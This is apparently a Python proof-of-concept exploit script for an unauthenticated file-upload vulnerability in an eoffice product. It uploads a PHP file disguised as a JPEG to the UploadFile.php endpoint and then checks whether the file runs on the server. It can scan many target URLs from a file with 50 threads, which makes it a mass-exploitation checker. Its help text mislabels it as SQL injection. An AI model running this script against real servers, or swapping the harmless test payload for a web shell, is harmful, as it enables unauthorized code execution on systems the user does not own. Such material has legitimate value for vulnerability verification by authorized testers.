#导包
import requests
import re
import sys
import argparse
from multiprocessing.dummy import Pool
import urllib3
urllib3.disable_warnings()

def banner():
    ico = """
.------..------..------..------..------.
|L.--. ||A.--. ||O.--. ||L.--. ||I.--. |
| :/\: || (\/) || :/\: || :/\: || (\/) |
| (__) || :\/: || :\/: || (__) || :\/: |
| '--'L|| '--'A|| '--'O|| '--'L|| '--'I|
`------'`------'`------'`------'`------'

    """
    print(ico)

def main():
    banner()
    parser = argparse.ArgumentParser(description='SQL INJECT')
    parser.add_argument('-u', '--url', dest='url', type=str, help='单个URL')
    parser.add_argument('-f', '--file', dest='file', type=str, help='批量URL文件')
    args = parser.parse_args()

    if args.url:
        poc(args.url)
    elif args.file:
        url_list = []
        with open(args.file, 'r', encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(50)
        mp.map(poc, url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usage:\n\t python3 {sys.argv[0]} -h")
#首先判断响应是否上传成功，再判断是否能访问到上传的文件
def poc(target):
    url = '/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId='
    files = {'Filedata': ('laoli.php', '<?php echo 123 ;?>', 'image/jpeg')}
    api='/images/logo/logo-eoffice.php'
    try:
        res = requests.post(url=target+url,files=files,verify=False,timeout=6)
        res1=requests.get(url=target+api,verify=False,timeout=6)
        if res.status_code==200 and 'eoffice.php' in res.text:
            if res1.status_code==200 and '123' in res1.text:
                print(f"[+]{target}    上传成功！！！请自行检测{target}/images/logo/logo-eoffice.php")
            else:
                print(f"[-]{target}    上传失败")
        else:
            print(f"[-]{target}    不存在漏洞")
    except:
            pass

    


if __name__ == '__main__':
    main()
